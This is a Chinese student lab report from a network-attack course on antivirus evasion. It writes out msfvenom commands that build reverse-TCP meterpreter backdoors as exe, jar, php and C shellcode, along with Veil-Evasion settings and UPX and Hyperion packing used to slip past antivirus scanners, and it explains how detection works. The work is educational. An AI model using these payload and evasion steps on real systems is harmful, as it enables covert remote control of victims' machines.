2018-2019-2 网络对抗技术 20165308 Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 20165308 Exp3 免杀原理与实践

1. 实践内容（3.5分）
   1.1 正确使用msf编码器（0.5分），msfvenom生成如jar之类的其他文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分）
   1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)
   （如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。）
   1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5）
   2 报告内容：
   2.1.基础问题回答
   （1）杀软是如何检测出恶意代码的？
   （2）免杀是做什么？
   （3）免杀的基本方法有哪些？
   2.2.实践总结与体会
   2.3.开启杀软能绝对防止电脑中恶意代码吗？
   2.4.实践过程记录
   3.报告评分 1分
   3.1 报告整体观感 0.5分
   3.1.1 报告格式范围，版面整洁 加0.5。
   3.1.2 报告排版混乱，加0分。
   3.2 文字表述 0.5分
   3.2.1报告逻辑清楚，比较简要地介绍了自己的操作目标与过程 加0.5分。
   3.2.2报告逻辑混乱表述不清或文字有明显抄袭可能 加0分

开始实验

任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

1. 正确使用msf编码器，生成exe文件

在实验二中使用msf生成了后门程序，我们可以使用VirusTotal或Virscan这两个网站对生成的后门程序进行扫描。
用VirusTotal扫描后结果如下：

在使用Virscan网站时，如果文件名中有数字就会出现以下错误，需要改名

改名过后Virscan网站的扫描结果如下：

由此可见不加任何处理的后门程序能够被大多数杀软检测到，下面我们用msf编码器对后门程序进行一次到多次的编码，并进行检测。
一次编码使用命令：-e选择编码器，-b是payload中需要去除的字符，该命令中为了使'\x00'不出现在shellcode中，因为shellcode以'\x00'为结束符
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.157 LPORT=5308 -f exe > msf20165308.exe

十次编码使用命令：-i设置迭代次数
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.157 LPORT=5308 -f exe > msf5308.exe

将编码十次后的可执行文件上传到VirusTotal扫描后结果如下：

可见多次编码并不能对免杀起什么作用。

2. msfvenom生成jar文件

生成java后门程序使用命令：
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.157 LPORT=5308 x> zsy_backdoor_java.jar
生成文件如下所示：

扫描结果如下：

3. msfvenom生成php文件

生成PHP后门程序使用命令：
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.157 LPORT=5308 x> 5308_backdoor.php
生成文件如下所示：

扫描结果如下：

4. 使用veil-evasion生成后门程序及检测

安装veil
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
用sudo apt-get install veil-evasion命令安装Veil
之后用veil打开veil，输入y继续安装直至完成：

输入veil指令，会出现下面这个界面

用use evasion命令进入Evil-Evasion

输入命令use c/meterpreter/rev_tcp.py进入配置界面

设置反弹连接IP，命令为：set LHOST 192.168.1.157，注意此处的IP是KaliIP；
设置端口，命令为：set LPORT 5308

输入generate生成文件，接着输入你想要playload的名字：veil_c_5308

检测一下：

还是一样的会被检查出来。

5. 半手工注入Shellcode并执行

首先使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.157 LPORT=5308 -f c用c语言生成一段shellcode;

创建一个文件20165308.c，然后将unsigned char buf[]赋值到其中，代码如下：

使用命令：i686-w64-mingw32-g++ 20165308.c -o 20165308.exe编译这个.c文件为可执行文件;

检测结果如下图：

当想要使用windows上执行该程序时，被电脑的360卫士查杀。

6.加壳尝试一下

使用压缩壳（UPX）

给之前的20165308.exe加个壳得到zsy_upxed.exe：

还是被杀软查杀了。

用360将其加入白名单.

后面想要测试连接就可以这样了，但是这样只是让杀软不再检查这个目录而已。
因为要回连，我将zsy_upxed.exe放到了ncat文件夹，查看连接情况，可以反弹连接（这一步开始就出现问题了，问题会写在实验感想里，可怕的迈克菲！！！！）（所以用了别人的电脑进行剩下的一点实验）

加密壳Hyperion
将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
进入目录/usr/share/windows-binaries/hyperion/中
输入命令wine hyperion.exe -v zsy_upxed.exe zsy_upxed_Hyperion.exe进行加壳：

尝试一下反弹连接

检查一下

任务二：通过组合应用各种技术实现恶意代码免杀

通过组合半手工制作shellcode，压缩壳，加密壳达到了免杀的目的
任务成功截图：

任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

这个实验由于之前说的问题 就是迈克菲那个，没有办法实现连入我的电脑。

免杀基础问题回答

1、杀软是如何检测出恶意代码的？
- 基于特征码的检测（杀软的特征库中包含了一些数据或者数据段，杀软会更新这个库，以记住更多的恶意代码，当一个可执行文件、脚本等包含这样的数据时就会被认为是恶意代码）。
- 启发式恶意软件检测（就是根据片面特征去进行检测，当某个软件或者程序想干一些看起来像是恶意软件才会去干的事情，那么他就是被定义为恶意软件，检测效果比较显著，可以检测0-day恶意软件，但通常缺乏精确判定依据，因为需要一直检测，所以开销比较大）（课上那个：当一个鸟像鸭子一样……，那它就是鸭子）。
- 基于行为的恶意软件检测（在启发式上加入了行为监控，基于动态的监控）。
2、免杀是做什么？
- 让程序无法被杀软查出来。
3、免杀的基本方法有哪些？
- 改写特征码（加壳）。
- 自己写代码刻意避开恶意代码。

实践总结与体会

本次实验，让我了解到了免杀的概念、免杀的方法（基于课上的讲解之后，更深一步的理解），熟练掌握了使用 VirusTotal、Virscan这些工具的方法，能够对后门动手实现一些免杀的处理，又复习了一遍实验二中主机之间监听、控制的操作，加深了印象，动手能力得到提升了。

问题！

因为迈克菲的原因（太强了，我关不掉他），中途出现了问题（只要后门程序点开就这样，然后自动删掉后门……）

根本没办法进行，然后我看了一下阻止记录

七次崩溃，我真的超爱他，最开始还以为是别的原因，最后发现了罪魁祸首，但我又能怎么样呢。
所以后面的实验有一些是同学电脑做的（所以有部分截图是同学的信息），还有一些自己电脑能够做出来的就用自己电脑做了。（最后VirusTotal检测zsy_upxed_Hyperion.exe的时候，那个显示没有病毒的那个，我甚至怀疑是因为迈克菲成功将中间的恶意部分去掉了，而不是我加壳成功了！）

离实战还缺些什么技术或步骤？

没有自己的想法，还是要看同学博客里的实验方向，然后跟着去做。应该学习更多的理论知识，形成自己的思路体系等，然后能自己规划出属于自己的实验方向。